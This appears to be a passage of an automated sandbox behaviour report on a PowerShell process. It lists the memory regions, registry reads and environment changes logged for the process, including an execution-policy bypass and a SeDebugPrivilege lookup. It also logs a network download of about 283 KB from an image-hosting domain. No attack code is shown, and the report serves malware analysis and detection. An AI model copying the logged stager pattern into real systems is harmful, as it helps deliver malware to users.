| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f140000 | 0x13f1b6fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fee0ea0000 | 0x7fee1034fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fee1040000 | 0x7fee11abfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fee11b0000 | 0x7fee1854fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fee1860000 | 0x7fee189dfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fee18a0000 | 0x7fee19b7fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fee19c0000 | 0x7fee1bd5fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee1be0000 | 0x7fee1cc4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee1cd0000 | 0x7fee1ffdfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee2000000 | 0x7fee2b5cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee2b60000 | 0x7fee3582fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee3590000 | 0x7fee446bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee4470000 | 0x7fee4e0cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee5020000 | 0x7fee50c9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee50d0000 | 0x7fee5101fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee52e0000 | 0x7fee5348fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee5350000 | 0x7fee5401fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee9d50000 | 0x7fee9de8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef35f0000 | 0x7fef365efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff0005ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00060000 | 0x7ff00060000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0010ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00110000 | 0x7ff00110000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00190000 | 0x7ff00190000 | 0x7ff0019ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (33)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\poWerSHell.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
17 | |
| Read | - | size = 4096, size_out = 3022 |
|
1 | |
| Read | - | size = 50, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
1 |
Registry (138)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
3 | |
| Open Key | System | - |
|
1 | |
| Open Key | System\PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
12 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | - | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (5)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\poWerSHell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\poWerSHell.exe, size = 260 |
|
2 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
3 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
3 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (135)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
128 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = images2.imgbox.com, address_out = 66.254.122.100, 66.254.122.102, 66.254.122.104 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 373 bytes |
| Total Data Received | 283.40 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 66.254.122.100:443 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x4c8 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 66.254.122.100 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 49165 |
| Data Sent | 373 bytes |
| Data Received | 283.40 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 66.254.122.100, remote_port = 443 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 122, size_out = 122 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 93, size_out = 93 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4588, size_out = 4588 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 331, size_out = 331 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4, size_out = 4 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 134, size_out = 134 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 117, size_out = 117 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
